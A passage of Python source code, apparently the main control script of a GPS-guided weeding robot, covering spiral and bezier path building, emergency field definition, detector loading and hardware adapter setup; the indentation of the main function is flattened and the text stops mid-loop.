        a1, a2 = compute_x1_x2_points(a, b, nav, logger)
        b1, b2 = compute_x1_x2_points(b, c, nav, logger)
        c1, c2 = compute_x1_x2_points(c, d, nav, logger)
        d1, _ = compute_x1_x2_points(d, a, nav, logger)
        if not check_points_for_nones(a1, a2, b1, b2, c1, c2, d1):
            # no more room for maneuvers - stop spiral at point A of this iteration
            center_fill_start_point = 1
            break
        b_corner_bezier = compute_bezier_points(a2, b, b1)
        if not add_points_to_path(path, *map(lambda gps_point: [gps_point, SI_speed_fwd], b_corner_bezier)):
            raise RuntimeError(
                "Failed to add B corner's bezier curve to path. This expected never to happen.")
        c_corner_bezier = compute_bezier_points(b2, c, c1)
        if not add_points_to_path(path, *map(lambda gps_point: [gps_point, SI_speed_fwd], c_corner_bezier)):
            raise RuntimeError(
                "Failed to add C corner's bezier curve to path. This expected never to happen.")
        d_corner_bezier = compute_bezier_points(c2, d, d1)
        if not add_points_to_path(path, *map(lambda gps_point: [gps_point, SI_speed_fwd], d_corner_bezier)):
            raise RuntimeError(
                "Failed to add D corner's bezier curve to path. This expected never to happen.")
        # check before computing d2 and A corner bezier curve (see d2 computing comments below for details)
        if nav.get_distance(d, a) <= config.MANEUVER_START_DISTANCE * 2 + config.SPIRAL_SIDES_INTERVAL \
                or nav.get_distance(a, b) <= config.MANEUVER_START_DISTANCE:
            center_fill_start_point = 2
            break
        # d2 isn't as other x2 points as d2 distance from A is spiral_sides_interval + start_turn_distance
        # instead of just start_turn_distance, so DA acceptable length computing is different (+spiral side interval)
        d2 = nav.get_point_on_vector(
            a, d, config.SPIRAL_SIDES_INTERVAL + config.MANEUVER_START_DISTANCE)
        a_spiral = nav.get_point_on_vector(a, d, config.SPIRAL_SIDES_INTERVAL)
        # a1_spiral point is inside the initial field, corner of D-A_spiral-A1_spiral = 90 degrees
        a1_spiral = nav.get_coordinate(
            a_spiral, d, 90, config.MANEUVER_START_DISTANCE)
        a_corner_bezier = compute_bezier_points(d2, a_spiral, a1_spiral)
        if not add_points_to_path(path, *map(lambda gps_point: [gps_point, SI_speed_fwd], a_corner_bezier)):
            raise RuntimeError(
                "Failed to add A corner's bezier curve to path. This expected never to happen.")
        # get A'B'C'D' (intermediate points used to compute new ABCD points for next iteration)
        # (int points are requiring given vector length >= spiral_sides_interval * 2
        # it is very small value and can be exceeded only if robot can turn almost inplace)
        b1_int, b2_int = compute_x1_x2_int_points(b, c, nav, logger)
        d1_int, d2_int = compute_x1_x2_int_points(d, a, nav, logger)
        if not check_points_for_nones(b1_int, b2_int, d1_int, d2_int):
            msg = "Some of intermediate points [B1_int B2_int D1_int D2_int] for next spiral generation are None. " \
                  "This could happen if spiral shift value is higher than robot's maneuverability. " \
                  "Check config.MANEUVER_START_DISTANCE and config.SPIRAL_SIDES_INTERVAL for wrong values."
            raise RuntimeError(msg)
        a_new, b_new = compute_x1_x2_int_points(d2_int, b1_int, nav, logger)
        c_new, d_new = compute_x1_x2_int_points(b2_int, d1_int, nav, logger)
        if not check_points_for_nones(a_new, b_new, c_new, d_new):
            msg = "Some of points [A_new B_new C_new D_new] for next spiral generation iteration are None. " \
                  "This could happen if spiral shift value is higher than robot's maneuverability. " \
                  "Check config.MANEUVER_START_DISTANCE and config.SPIRAL_SIDES_INTERVAL for wrong values."
            raise RuntimeError(msg)
        a, b, c, d = a_new, b_new, c_new, d_new
    if config.ADD_FORWARD_BACKWARD_TO_END_PATH:
        if center_fill_start_point == 0:
            msg = "Asked to fill field's center during path building, but filling start position point flag was not " \
                  "changed from it's initial value."
            raise RuntimeError(msg)
        elif center_fill_start_point == 1:  # when robot is going to stop spiral movement at point A'n
            path = build_forward_backward_path(
                [a, b, c, d],
                nav,
                logger,
                SI_speed_fwd,
                SI_speed_rev,
                path)
        elif center_fill_start_point == 2:  # when robot is going to stop spiral movement at point D'n
            path = build_forward_backward_path(
                [d, a, b, c],
                nav,
                logger,
                SI_speed_fwd,
                SI_speed_rev,
                path)
        else:
            msg = "Asked to fill field's center during path building, but filling start position point flag value " \
                  "is not supported."
            raise NotImplementedError(msg)
    return path
def build_path(abcd_points: list, nav: navigation.GPSComputing, logger: utility.Logger, SI_speed_fwd: float, SI_speed_rev: float):
    """Obsolete spiral path builder, kept only as a guarded stub.

    Always raises NotImplementedError; use the more advanced path builders
    (bezier or zigzag) instead.

    NOTE(review): the original implementation that followed this raise was
    unreachable dead code (the raise was unconditional and the first
    statement) and has been removed. Recover it from version control if the
    old non-bezier spiral logic is ever needed as a reference.

    :param abcd_points: [A, B, C, D] field corner points (unused)
    :param nav: GPS computing helper (unused)
    :param logger: full log writer (unused)
    :param SI_speed_fwd: forward speed in SI units (unused)
    :param SI_speed_rev: reverse speed in SI units (unused)
    :raises NotImplementedError: always
    """
    raise NotImplementedError(
        "an obsolete code, use more advanced path builders like bezier or zigzag")
def compute_x1_x2(point_a, point_b, distance, nav: navigation.GPSComputing):
    """Return two points X1, X2 lying on the vector [A, B].

    X1 is placed so that |A, X1| = distance, X2 so that |X2, B| = distance.

    :param point_a: vector start point
    :param point_b: vector end point
    :param distance: offset from each vector end (same units as nav distances)
    :param nav: GPS computing helper used for distance and point math
    :return: tuple (x1, x2)
    :raises ValueError: if the AB vector is shorter than the given distance
    """
    vector_len = nav.get_distance(point_a, point_b)
    if vector_len < distance:
        raise ValueError(f"Size of AB vector ({vector_len}) should be greater than a given distance: {distance}")
    point_x1 = nav.get_point_on_vector(point_a, point_b, distance)
    point_x2 = nav.get_point_on_vector(point_a, point_b, vector_len - distance)
    return point_x1, point_x2
def reduce_field_size(abcd_points: list, reduce_size, nav: navigation.GPSComputing):
    """Shrink the given ABCD field by reduce_size from each side.

    :param abcd_points: [A, B, C, D] corner points of the field
    :param reduce_size: distance to cut from every side
    :param nav: GPS computing helper
    :return: new [A, B, C, D] list of corner points
    """
    point_a = abcd_points[0]
    point_b = abcd_points[1]
    point_c = abcd_points[2]
    point_d = abcd_points[3]
    # shift along the BC and DA sides first, then connect the shifted points
    # to each other to obtain the new, smaller field corners
    bc_x1, bc_x2 = compute_x1_x2(point_b, point_c, reduce_size, nav)
    da_x1, da_x2 = compute_x1_x2(point_d, point_a, reduce_size, nav)
    new_a, new_b = compute_x1_x2(da_x2, bc_x1, reduce_size, nav)
    new_c, new_d = compute_x1_x2(bc_x2, da_x1, reduce_size, nav)
    return [new_a, new_b, new_c, new_d]
def emergency_field_defining(vesc_engine: adapters.VescAdapterV4, gps: adapters.GPSUbloxAdapter,
                             nav: navigation.GPSComputing, cur_log_dir, logger_full: utility.Logger):
    """Drive forward for a fixed time and derive a square field from the traveled segment.

    Moves the robot forward for config.EMERGENCY_MOVING_TIME seconds, takes the
    reached position as point A, then computes B, C, D as a square of side
    config.EMERGENCY_FIELD_SIZE extending away from the starting point.
    Saves the field to "field.txt" (and a raw copy into cur_log_dir) and
    returns it as [A, B, C, D].
    """
    def _report(message: str):
        # keep the original side-effect order: file log first, then console
        logger_full.write(message + "\n")
        print(message)

    _report("Using emergency field creation...")
    start_point = gps.get_last_position()

    _report("Moving forward...")
    vesc_engine.set_time_to_move(float("inf"), vesc_engine.PROPULSION_KEY)
    vesc_engine.start_moving(engine_key=vesc_engine.PROPULSION_KEY)
    time.sleep(config.EMERGENCY_MOVING_TIME)
    vesc_engine.stop_moving(engine_key=vesc_engine.PROPULSION_KEY)

    _report("Getting point A...")
    time.sleep(2)
    point_a = gps.get_last_position()

    _report("Computing rest points...")
    point_b = nav.get_coordinate(point_a, start_point, 180, config.EMERGENCY_FIELD_SIZE)
    point_c = nav.get_coordinate(point_b, point_a, 90, config.EMERGENCY_FIELD_SIZE)
    point_d = nav.get_coordinate(point_c, point_b, 90, config.EMERGENCY_FIELD_SIZE)

    _report("Saving field.txt file...")
    field = [point_a, point_b, point_c, point_d]
    save_gps_coordinates(field, "field.txt")
    save_gps_coordinates_raw(
        [start_point, point_a, point_b, point_c, point_d], cur_log_dir + "emergency_raw_field.txt")
    return field
def send_name_of_file_of_gps_history(ui_msg_queue: posix_ipc.MessageQueue,
                                     gps_file_dir: str,
                                     gps_file_name: str,
                                     logger_full: utility.Logger):
    """Send the GPS history file path over the given message queue if the file exists.

    If the file is missing, the failure is logged (and printed when
    config.VERBOSE is set) instead of raising.

    :param ui_msg_queue: queue the JSON message is sent to
    :param gps_file_dir: directory of the GPS history file (expected to end with a separator)
    :param gps_file_name: name of the GPS history file
    :param logger_full: full log writer
    """
    gps_file_path = gps_file_dir + gps_file_name
    if os.path.isfile(gps_file_path):
        ui_msg_queue.send(json.dumps({"last_gps_list_file": gps_file_path}))
    else:
        # bug fix: the old message hard-coded "used_gps_history.txt" and added a
        # spurious "/"; report the path that was actually checked instead
        msg = f"Could not find {gps_file_path} file to send previous points to the web UI"
        logger_full.write(msg + "\n")
        if config.VERBOSE:
            print(msg)
def get_bezier_indexes(path_points: list):
    """ONLY for bezier path with NO backward-forward at corners. Presence of zigzags at field center is ok.

    Returns list of bezier points indexes.

    Points with positive speed belong to the spiral; the first non-positive
    speed marks the start of the zigzag center filling and ends the scan.
    Within the spiral part, A/B corner anchor points recur every
    config.NUMBER_OF_BEZIER_POINT indexes (starting at 0 and 1); every other
    index belongs to a bezier curve.

    :param path_points: list of [gps_point, speed, ...] items
    :raises ValueError: if fewer than 2 points are given or a point has 0 speed
    """
    if len(path_points) < 2:
        raise ValueError(f"path_points must contain at least 2 points, got {len(path_points)} instead")
    last_non_zigzag_idx = 0
    for i, point in enumerate(path_points):
        speed = point[1]
        if math.isclose(speed, 0):
            raise ValueError(f"POINT {i} HAS 0 SPEED!")
        elif speed > 0:
            last_non_zigzag_idx = i
        else:
            # negative speed -> zigzag center filling starts here
            break
    a_non_bezier_indexes = [0]  # A corner anchor points
    b_non_bezier_indexes = [1]  # B corner anchor points
    while last_non_zigzag_idx > b_non_bezier_indexes[-1]:
        a_non_bezier_indexes.append(a_non_bezier_indexes[-1] + config.NUMBER_OF_BEZIER_POINT)
        b_non_bezier_indexes.append(b_non_bezier_indexes[-1] + config.NUMBER_OF_BEZIER_POINT)
    # set lookup keeps the filter O(n) instead of O(n^2) list membership scans
    non_bezier_indexes = set(a_non_bezier_indexes) | set(b_non_bezier_indexes)
    return [i for i in range(last_non_zigzag_idx + 1) if i not in non_bezier_indexes]
def main():
time_start = utility.get_current_time()
utility.create_directories(config.LOG_ROOT_DIR)
# choose log dir dependent continuing previous path or not
if config.CONTINUE_PREVIOUS_PATH:
last_log_dir = utility.get_last_dir_name(config.LOG_ROOT_DIR)
if last_log_dir is not None:
log_cur_dir = config.LOG_ROOT_DIR + last_log_dir + "/"
else:
log_cur_dir = config.LOG_ROOT_DIR + time_start + "/"
else:
log_cur_dir = config.LOG_ROOT_DIR + time_start + "/"
utility.create_directories(
log_cur_dir, config.DEBUG_IMAGES_PATH, config.DATA_GATHERING_DIR)
try:
if config.QUEUE_MESSAGES_MAX is not None:
ui_msg_queue = posix_ipc.MessageQueue(
config.QUEUE_NAME_UI_MAIN, max_messages=config.QUEUE_MESSAGES_MAX)
else:
ui_msg_queue = posix_ipc.MessageQueue(config.QUEUE_NAME_UI_MAIN)
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
ui_msg_queue = None
image_saver = utility.ImageSaver()
if config.ALLOW_GATHERING:
image_saver.set_counter(
len(glob.glob(config.DATA_GATHERING_DIR + "*.jpg")), "gathering")
notification = NotificationClient(time_start)
notification.set_robot_state(RobotStates.WORKING)
data_collector = datacollection.DataCollector(
log_cur_dir + config.STATISTICS_DB_FILE_NAME,
notification,
load_from_file=config.CONTINUE_PREVIOUS_PATH,
file_path=log_cur_dir + config.DATACOLLECTOR_SAVE_FILE,
ui_msg_queue=ui_msg_queue,
dump_at_receiving=True)
working_zone_polygon = Polygon(config.WORKING_ZONE_POLY_POINTS)
nav = navigation.GPSComputing()
logger_full = utility.Logger(
log_cur_dir + "log full.txt", append_file=config.CONTINUE_PREVIOUS_PATH)
# X axis movement during periphery scans config settings validation
if config.ALLOW_X_MOVEMENT_DURING_SCANS:
if len(config.X_MOVEMENT_CAMERA_POSITIONS) != len(config.X_MOVEMENT_CAMERA_X_F) != \
len(config.X_MOVEMENT_IMAGE_ZONES) or len(config.X_MOVEMENT_CAMERA_POSITIONS) in [0, 1]:
msg = "Disabling X axis movement during scans as lengths of positions/forces/image areas are not equal " \
"or there's less than 2 elements in list of positions/forces/image areas!"
logger_full.write(msg + "\n")
print(msg)
config.ALLOW_X_MOVEMENT_DURING_SCANS = False
if config.ALLOW_X_MOVEMENT_DURING_SCANS:
x_scan_poly = ExtractionManagerV3.pdz_dist_to_poly(
config.X_MOVEMENT_IMAGE_ZONES)
else:
x_scan_poly = []
# get smoothie and vesc addresses
smoothie_vesc_addr = utility.get_smoothie_vesc_addresses()
if "vesc" in smoothie_vesc_addr:
vesc_address = smoothie_vesc_addr["vesc"]
else:
msg = "Couldn't get vesc's USB address!"
print(msg)
logger_full.write(msg + "\n")
notification.set_robot_state(RobotStates.OUT_OF_SERVICE)
exit()
if config.SMOOTHIE_BACKEND == 1:
smoothie_address = config.SMOOTHIE_HOST
else:
if "smoothie" in smoothie_vesc_addr:
smoothie_address = smoothie_vesc_addr["smoothie"]
else:
msg = "Couldn't get smoothie's USB address!"
print(msg)
logger_full.write(msg + "\n")
notification.set_robot_state(RobotStates.OUT_OF_SERVICE)
exit()
# load yolo networks
if config.NN_MODELS_COUNT < 1:
msg = f"Key 'config.NN_MODELS_COUNT' has 0 or negative value which is wrong as need at least 1 model for work"
print(msg)
logger_full.write(msg + "\n")
exit()
# load periphery NN
msg = "Loading periphery detector..."
print(msg)
logger_full.write(msg + "\n")
if config.PERIPHERY_WRAPPER == 1:
periphery_detector = detection.YoloTRTDetector(
config.PERIPHERY_MODEL_PATH,
config.PERIPHERY_CLASSES_FILE,
config.PERIPHERY_CONFIDENCE_THRESHOLD,
config.PERIPHERY_NMS_THRESHOLD,
config.PERIPHERY_INPUT_SIZE)
elif config.PERIPHERY_WRAPPER == 2:
periphery_detector = detection.YoloOpenCVDetection(
config.PERIPHERY_CLASSES_FILE,
config.PERIPHERY_CONFIG_FILE,
config.PERIPHERY_WEIGHTS_FILE,
config.PERIPHERY_INPUT_SIZE,
config.PERIPHERY_CONFIDENCE_THRESHOLD,
config.PERIPHERY_NMS_THRESHOLD,
config.PERIPHERY_DNN_BACKEND,
config.PERIPHERY_DNN_TARGET)
else:
msg = "Wrong config.PERIPHERY_WRAPPER = " + \
str(config.PERIPHERY_WRAPPER) + " code. Exiting."
logger_full.write(msg + "\n")
notification.set_robot_state(RobotStates.OUT_OF_SERVICE)
exit()
# load precise NN
if config.NN_MODELS_COUNT > 1:
msg = "Loading precise detector..."
print(msg)
logger_full.write(msg + "\n")
if config.PRECISE_WRAPPER == 1:
precise_detector = detection.YoloTRTDetector(
config.PRECISE_MODEL_PATH,
config.PRECISE_CLASSES_FILE,
config.PRECISE_CONFIDENCE_THRESHOLD,
config.PRECISE_NMS_THRESHOLD,
config.PRECISE_INPUT_SIZE)
elif config.PRECISE_WRAPPER == 2:
precise_detector = detection.YoloOpenCVDetection(
config.PRECISE_CLASSES_FILE,
config.PRECISE_CONFIG_FILE,
config.PRECISE_WEIGHTS_FILE,
config.PRECISE_INPUT_SIZE,
config.PRECISE_CONFIDENCE_THRESHOLD,
config.PRECISE_NMS_THRESHOLD,
config.PRECISE_DNN_BACKEND,
config.PRECISE_DNN_TARGET)
else:
msg = "Wrong config.PRECISE_WRAPPER = " + \
str(config.PRECISE_WRAPPER) + " code. Exiting."
logger_full.write(msg + "\n")
notification.set_robot_state(RobotStates.OUT_OF_SERVICE)
exit()
else:
msg = "Using periphery detector as precise."
print(msg)
logger_full.write(msg + "\n")
precise_detector = periphery_detector
if config.CONTINUOUS_INFORMATION_SENDING:
treated_plants = set()
treated_plants.update(periphery_detector.get_classes_names())
treated_plants.update(precise_detector.get_classes_names())
notification.set_treated_weed_types(treated_plants)
# load and send trajectory to the UI if continuing work
if config.CONTINUE_PREVIOUS_PATH:
if ui_msg_queue is not None:
send_name_of_file_of_gps_history(
ui_msg_queue, log_cur_dir, "used_gps_history.txt", logger_full)
else:
msg = "GPS message queue connection is not established (None), canceling gps sending to UI"
logger_full.write(msg + "\n")
if config.VERBOSE:
print(msg)
# sensors picking
report_field_names = ['temp_fet_filtered', 'temp_motor_filtered', 'avg_motor_current',
'avg_input_current', 'rpm', 'input_voltage']
try:
msg = "Initializing..."
print(msg)
logger_full.write(msg + "\n")
vesc_speed = config.SI_SPEED_FWD*config.MULTIPLIER_SI_SPEED_TO_RPM
# stubs.GPSStub(config.GPS_PORT, config.GPS_BAUDRATE, config.GPS_POSITIONS_TO_KEEP) as gps, \
# utility.MemoryManager(config.DATA_GATHERING_DIR, config.FILES_TO_KEEP_COUNT) as memory_manager, \
with \
utility.TrajectorySaver(log_cur_dir + "used_gps_history.txt",
config.CONTINUE_PREVIOUS_PATH) as trajectory_saver, \
adapters.VescAdapterV4(vesc_address, config.VESC_BAUDRATE, config.VESC_ALIVE_FREQ, config.VESC_CHECK_FREQ,
config.VESC_STOPPER_CHECK_FREQ) as vesc_engine, \
adapters.SmoothieAdapter(smoothie_address) as smoothie, \
adapters.GPSUbloxAdapter(config.GPS_PORT, config.GPS_BAUDRATE, config.GPS_POSITIONS_TO_KEEP) as gps, \
adapters.CameraAdapterIMX219_170(config.CROP_W_FROM, config.CROP_W_TO, config.CROP_H_FROM,
config.CROP_H_TO, config.CV_ROTATE_CODE,
config.ISP_DIGITAL_GAIN_RANGE_FROM,
config.ISP_DIGITAL_GAIN_RANGE_TO,
config.GAIN_RANGE_FROM, config.GAIN_RANGE_TO,
config.EXPOSURE_TIME_RANGE_FROM, config.EXPOSURE_TIME_RANGE_TO,
config.AE_LOCK, config.CAMERA_W, config.CAMERA_H, config.CAMERA_W,
config.CAMERA_H, config.CAMERA_FRAMERATE,
config.CAMERA_FLIP_METHOD) as camera, \
ExtractionManagerV3(smoothie, camera, logger_full, data_collector, image_saver,
log_cur_dir, periphery_detector, precise_detector,
config.CAMERA_POSITIONS, config.PDZ_DISTANCES, vesc_engine) as extraction_manager_v3, \
navigation.NavigationPrediction(
logger_full=logger_full,
nav=nav,
log_cur_dir=log_cur_dir) as navigation_prediction:
# try to load field ABCD points
field_gps_coords = None
field_name = None
if config.USE_EMERGENCY_FIELD_GENERATION and not config.CONTINUE_PREVIOUS_PATH:
field_gps_coords = emergency_field_defining(vesc_engine, gps, nav, log_cur_dir, logger_full)
else:
# check if shortcut exists
if os.path.isfile(config.INPUT_GPS_FIELD_FILE):
# check if shortcut target file exists
# old way: shortcut_target_path = subprocess.check_output(['readlink', '-f', config.INPUT_GPS_FIELD_FILE]).decode("utf-8").strip()
shortcut_target_path = os.path.realpath(config.INPUT_GPS_FIELD_FILE)
field_name = (shortcut_target_path.split("/")[-1]).split(".")[0]
if os.path.isfile(shortcut_target_path):
msg = f"Loading '{config.INPUT_GPS_FIELD_FILE}' field file"
logger_full.write(msg + "\n")
try:
field_gps_coords = load_coordinates(config.INPUT_GPS_FIELD_FILE) # [A, B, C, D]
except ValueError:
msg = f"Failed to load field '{shortcut_target_path}' due " \
f"to ValueError (file is likely corrupted)"
print(msg)
logger_full.write(msg + "\n")
msg = f"Loaded field: {str(field_gps_coords)}"
print(msg)
logger_full.write(msg + "\n")
else:
msg = f"Couldn't find '{os.path.realpath(config.INPUT_GPS_FIELD_FILE)}' target file with" \
f"field points"
print(msg)
logger_full.write(msg + "\n")
else:
msg = f"Couldn't find '{config.INPUT_GPS_FIELD_FILE}' shortcut file with field points"
print(msg)
logger_full.write(msg + "\n")
# set field to notification
if config.CONTINUOUS_INFORMATION_SENDING:
if field_gps_coords is None:
msg = f"Sending field to notification is aborted as field is None"
print(msg)
logger_full.write(msg)
elif field_name is None:
msg = f"Sending field to notification is aborted as field name is None"
print(msg)
logger_full.write(msg)
elif len(field_gps_coords) < 1:
msg = f"Loaded '{shortcut_target_path}' field contains 0" \
f"points. Sending to notification is aborted."
print(msg)
logger_full.write(msg + "\n")
else:
notification.set_field(field_gps_coords.copy(), field_name)
# continue previous path case
loading_previous_path_failed = False
loading_previous_index_failed = False
if config.CONTINUE_PREVIOUS_PATH:
# TODO: maybe make a path manager and put field and path loading and checking etc there
msg = "Loading previous path points"
logger_full.write(msg + "\n")
if not os.path.isfile(config.PREVIOUS_PATH_POINTS_FILE):
loading_previous_path_failed = True
msg = f"Couldn't find '{config.PREVIOUS_PATH_POINTS_FILE}' file with previous path points. " \
f"Trying to generate path points of current field from scratch."
print(msg)
logger_full.write(msg + "\n")
else:
# data validation is done later as it needed both to loaded and new generated path
with open(config.PREVIOUS_PATH_POINTS_FILE, "rb") as path_points_file:
path_points = pickle.load(path_points_file)
if not os.path.isfile(config.PREVIOUS_PATH_INDEX_FILE):
loading_previous_index_failed = True
msg = f"Couldn't find '{config.PREVIOUS_PATH_INDEX_FILE}' file with point index to continue."
print(msg)
logger_full.write(msg + "\n")
else:
with open(config.PREVIOUS_PATH_INDEX_FILE, "r+") as path_index_file:
str_index = path_index_file.readline().strip()
try:
path_start_index = int(str_index)
except ValueError:
loading_previous_index_failed = True
msg = f"Couldn't convert path point index '{str_index}' into int."
print(msg)
logger_full.write(msg + "\n")
if path_start_index == -1:
msg = "Previous path is already passed"
print(msg)
logger_full.write_and_flush(msg + "\n")
notification.close()
exit()
elif path_start_index >= len(path_points) or path_start_index < 1:
loading_previous_index_failed = True
msg = f"Path start index {path_start_index} is out of path points list range (loaded " \
f"{len(path_points)} points)"
print(msg)
logger_full.write(msg + "\n")
if loading_previous_index_failed:
msg = "Creating new path index storage file, and going to start this field from 1rst point " \
"due to index loading troubles (see log above for details)"
print(msg)
logger_full.write(msg + "\n")
path_start_index = 1
with open(config.PREVIOUS_PATH_INDEX_FILE, "w") as path_index_file:
path_index_file.write(str(path_start_index))
# load field points and generate new path or continue previous path errors case
if not config.CONTINUE_PREVIOUS_PATH or loading_previous_path_failed:
if field_gps_coords is None:
msg = f"Exiting main as building path without field points is impossible"
print(msg)
logger_full.write_and_flush(msg)
notification.set_robot_state(RobotStates.OUT_OF_SERVICE)
exit()
# check field corner points count
if len(field_gps_coords) == 4:
field_gps_coords = reduce_field_size(
field_gps_coords, config.FIELD_REDUCE_SIZE, nav)
msg = "Reduced field: " + str(field_gps_coords)
print(msg)
logger_full.write(msg + "\n")
# generate path points
path_start_index = 1
if config.TRADITIONAL_PATH:
path_points = build_path(
field_gps_coords,
nav,
logger_full,
config.SI_SPEED_FWD,
config.SI_SPEED_REV)
elif config.BEZIER_PATH:
path_points = build_bezier_path(
field_gps_coords,
nav,
logger_full,
config.SI_SPEED_FWD,
config.SI_SPEED_REV)
elif config.FORWARD_BACKWARD_PATH:
path_points = build_forward_backward_path(
field_gps_coords,
nav,
logger_full,
config.SI_SPEED_FWD,
config.SI_SPEED_REV)
msg = "Generated " + str(len(path_points)) + " points."
logger_full.write(msg + "\n")
elif len(field_gps_coords) == 2:
path_start_index = 1
path_points = field_gps_coords
else:
msg = "Expected 4 or 2 gps corner points, got " + str(len(field_gps_coords)) + "\nField:\n" + str(
field_gps_coords)
print(msg)
logger_full.write(msg + "\n")
notification.set_robot_state(RobotStates.OUT_OF_SERVICE)
exit()
# save path points and point to start from index
with open(config.PREVIOUS_PATH_POINTS_FILE, "wb") as path_points_file:
pickle.dump(path_points, path_points_file)
with open(config.PREVIOUS_PATH_INDEX_FILE, "w") as path_index_file:
path_index_file.write(str(path_start_index))
if len(path_points) > 0:
save_gps_coordinates(
path_points, log_cur_dir + "current_path_points.txt")
msg = "Current path points are successfully saved."
print(msg)
logger_full.write(msg + "\n")
else:
msg = "List of path points is empty, saving canceled."
print(msg)
logger_full.write(msg + "\n")
if len(path_points) < 2:
msg = "Expected at least 2 points in path, got " + str(len(path_points)) + \
" instead (1st point is starting point)."
print(msg)
logger_full.write(msg + "\n")
notification.set_robot_state(RobotStates.OUT_OF_SERVICE)
exit()
# set smoothie's A axis to 0 (nav turn wheels)
response = smoothie.set_current_coordinates(A=0)
if response != smoothie.RESPONSE_OK:
msg = "Failed to set A=0 on smoothie (turning wheels init position), response message:\n" + response
print(msg)
logger_full.write(msg + "\n")
"""
# ask permission to start moving
msg = "Initializing done. Press enter to start moving."
input(msg)
logger_full.write(msg + "\n")
"""
msg = 'GpsQ|Raw ang|Res ang|Ord ang|Sum ang|Distance |Adapter|Smoothie|PointStatus|deviation|side dev|' \
'centroid factor|cruise factor'
print(msg)
logger_full.write(msg + "\n")
# path points visiting loop
with open(
config.PREVIOUS_PATH_INDEX_FILE,
"r+" if os.path.isfile(config.PREVIOUS_PATH_INDEX_FILE) else "w") as path_index_file:
# TODO: temp. wheels mechanics hotfix. please don't repeat things I did here they are not good.
if config.ENABLE_ADDITIONAL_WHEELS_TURN:
if config.TRADITIONAL_PATH:
msg = f"wheels additional turn is enabled (cur. config.ENABLE_ADDITIONAL_WHEELS_TURN=True), " \
f"and it's not compatible with traditional path (cur. config.TRADITIONAL_PATH=True)"
raise RuntimeError(msg)
if not config.BEZIER_PATH:
msg = f"wheels additional turn is enabled, and it's compatible only with bezier path " \
f"(cur. config.BEZIER_PATH=False)"
raise RuntimeError(msg)
if config.FORWARD_BACKWARD_PATH:
msg = f"wheels additional turn is enabled, and it's not compatible with forward-backward " \
f"path building option (cur. config.FORWARD_BACKWARD_PATH=True)"
raise RuntimeError(msg)
if config.ADD_CORNER_TO_BEZIER_PATH:
msg = f"wheels additional turn is enabled, and it's not compatible with " \
f"ADD_CORNER_TO_BEZIER_PATH building path option " \
f"(cur. config.ADD_CORNER_TO_BEZIER_PATH=True)"
raise RuntimeError(msg)
smoothie_tel_conn = None
try:
bezier_points_indexes = get_bezier_indexes(path_points)
smoothie_tel_conn = connectors.SmoothieV11TelnetConnector(config.SMOOTHIE_TELNET_HOST)
smoothie_tel_conn.write("G91")
res = smoothie_tel_conn.read_some()
if res != smoothie.RESPONSE_OK:
msg = f"Couldn't set smoothie telnet connection to relative mode:\n{res}\n" \
f"Telnet connection usage will be disabled."
print(msg)
logger_full.write(msg + "\n")
smoothie_tel_conn = None
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
msg = f"Wheels additional turn preparations are failed:\n" \
f"{traceback.format_exc()}\n" \
f"Telnet connection usage will be disabled."
print(msg)
logger_full.write(msg + "\n")
smoothie_tel_conn = None
next_calibration_time = time.time() + config.CORK_CALIBRATION_MIN_TIME
try:
start_position = utility.average_point(
gps, trajectory_saver, nav)
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
pass
if ui_msg_queue is not None:
try:
ui_msg_queue.send(json.dumps({"start": True}))
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
pass
last_direction_of_travel = None # 1 -> moving forward #-1 -> moving backward
if config.NAVIGATION_TEST_MODE:
path_end_index = sys.maxsize
else:
path_end_index = len(path_points)
# applies improved approaching to path during continuing previous field job
if config.CONTINUE_PREVIOUS_PATH and config.USE_SMOOTH_APPROACHING_TO_FIELD:
smooth_preparation_ok = True
if config.TRADITIONAL_PATH:
smooth_preparation_ok = False
msg = "USING RUDE TRAJECTORY APPROACHING as traditional path is not supported by smooth " \
"approaching feature."
logger_full.write(msg + "\n")
elif config.BEZIER_PATH:
traj_path_start_index = path_start_index
cur_pos = gps.get_fresh_position()
# speed 0 is abnormal TODO what robot should do in this case?
if math.isclose(path_points[traj_path_start_index][1], 0):
smooth_preparation_ok = False
msg = f"USING RUDE TRAJECTORY APPROACHING as point (path_points[{traj_path_start_index}])" \
f" speed is 0 (look at generated path points, speed 0 is not ok)."
logger_full.write(msg + "\n")
# zigzag (speed < 0)
elif path_points[traj_path_start_index][1] < 0:
# skip negative speed points until positive speed or path end
log_traj_start_idx = traj_path_start_index
traj_path_start_index += 1
while traj_path_start_index < len(path_points):
if path_points[traj_path_start_index][1] > 0 and not math.isclose(
path_points[traj_path_start_index][1], 0):
break
traj_path_start_index += 1
else:
smooth_preparation_ok = False
msg = f"USING RUDE TRAJECTORY APPROACHING as couldn't find any points " \
f"(from {log_traj_start_idx} to {traj_path_start_index}) with positive speed " \
f"to continue zigzag."
logger_full.write(msg + "\n")
# spiral or zigzag (speed > 0)
else:
# prev point speed 0 is abnormal TODO what robot should do in this case?
if math.isclose(path_points[traj_path_start_index - 1][1], 0):
smooth_preparation_ok = False
msg = f"USING RUDE TRAJECTORY APPROACHING as point (path_points[" \
f"{traj_path_start_index - 1}]) speed is 0 (look at generated path points, " \
f"speed 0 is not ok)."
logger_full.write(msg + "\n")
# spiral
elif path_points[traj_path_start_index - 1][1] > 0:
# generate non bezier indexes
a_non_bezier_indexes = [0] # A points
b_non_bezier_indexes = [1] # B points
while traj_path_start_index > b_non_bezier_indexes[-1]:
a_non_bezier_indexes.append(
a_non_bezier_indexes[-1] + config.NUMBER_OF_BEZIER_POINT)
b_non_bezier_indexes.append(
b_non_bezier_indexes[-1] + config.NUMBER_OF_BEZIER_POINT)
# look for index of point which will be used to get the robot to trajectory
# ABAP correct angle: -180 to -90 or 170 to 180
# BAAP correct angle: -10 to 90 (using this)
for point_a_idx, point_b_idx in zip(reversed(a_non_bezier_indexes),
reversed(b_non_bezier_indexes)):
angle = nav.get_angle(
path_points[point_b_idx][0],
path_points[point_a_idx][0],
path_points[point_a_idx][0],
cur_pos)
if -10 <= angle <= 90:
traj_path_start_index = point_a_idx
break
else:
smooth_preparation_ok = False
msg = "USING RUDE TRAJECTORY APPROACHING as couldn't find any previous point " \
"with a satisfactory angle to get on trajectory."
logger_full.write(msg + "\n")
# zigzag (prev point speed is negative)
else:
# skip negative speed points until positive speed or path end
traj_path_start_index += 1
while traj_path_start_index < len(path_points):
